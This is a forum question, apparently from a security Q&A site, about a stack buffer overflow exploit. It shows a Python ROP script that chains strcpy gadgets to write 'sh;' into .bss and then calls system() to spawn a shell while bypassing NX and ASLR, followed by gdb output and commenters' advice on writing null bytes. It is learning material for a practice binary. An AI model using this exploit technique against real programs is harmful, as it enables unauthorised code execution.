1

I have one problem, while doing NX + ASLR bypass. I'm going through this tutorial step-by-step.

Everything is going well, I have prepared my exploit, just with another address and some small modifications:

#!/usr/bin/python

from struct import pack
from os import system

junk = 'A'*1036 #junk to offset to stored ret
strcpy = pack("<L", 0x8048310)
ppr = pack("<L", 0x080484ee) #pop pop ret

p = junk
p += strcpy
p += ppr
p += pack("<L", 0x0804a024) #bss
p += pack("<L", 0x08048162) # 's'
p += strcpy
p += ppr
p += pack("<L", 0x0804a025) #bss+1
p += pack("<L", 0x080480d8) # 'h'
p += strcpy
p += ppr
p += pack("<L", 0x0804a026) #bss+2
p += pack("<L", 0x0804852f) # ';'
p += pack("<L", 0x08048320) #system@plt
p += "AAAA"
p += pack("<L", 0x0804a024) #bss (now contains "sh;<junk>")

system("/tmp/a.out \""+p+"\"")

If I run it, nothing happens. But if I modify passage with the address of "system@plt" with the address of system from libc I get a segmentation fault.

p += pack("<L", 0xb7e4e104) #system from libc
p += "J" * 8 # sub esp,0xc
p += pack("<L", 0xdeadbeef) # exit
p += pack("<L", 0x0804a024) #bss (now contains "sh;<junk>")

system("/tmp/a.out \""+p+"\"")

./exploit.py and.... "Segmentation fault". I enabled core dumps to check what happened and I found this:

Program received signal SIGSEGV, Segmentation fault. 0x0804a024 in completed ()

This address contains:

(gdb) x/s 0x0804a024

0x804a024 : "sh;("

"sh;(" hm...? I would like to ask a few questions.

  1. Is that '(' reason, why I'm getting segmentation fault instead of shell?
  2. How can I remove/fix it? I tried a different things, but without results.
  3. Why does using the address of "system@plt" not work? More precisely, does nothing. However, in the SpiderLabs tutorial everything works?

I know there are more ways to bypass ASLR + NX, but I'm curious what is going wrong.

core2dump
  • 11
  • 2
  • Try adding a 3rd strcpy gadget using a rop gadget that points to a null byte, so that bss+3 is set to \0, thus terminating the string before any junk. – Polynomial Sep 01 '15 at 20:15
  • How to get a gadget that will points to a null byte? '\0' using memstr option in ROPgadget seem not possible or... – core2dump Sep 01 '15 at 21:03
  • Good point; strcpy won't copy a null, hence your problem in the first place. You could use a memcpy gadget instead, or look for a gadget that'll do something like pop eax; mov [eax+??], 0; ret (where eax could be any general purpose register, and the offset is any sensible value, or just zero). This would let you do an arbitrary memory write of null bytes. – Polynomial Sep 02 '15 at 08:42
  • Correct me, if I'm wrong, but I don't think, using memcpy is possible, because the only usable functions are system and strcpy. I have available these gadgets - http://pastebin.com/mSUKi3n4 .. Do you think there is some, that could do the trick? I was also toyed with null byte again, but for the change, I got segmentation fault with '0' in the end. – core2dump Sep 02 '15 at 17:22

0 Answers0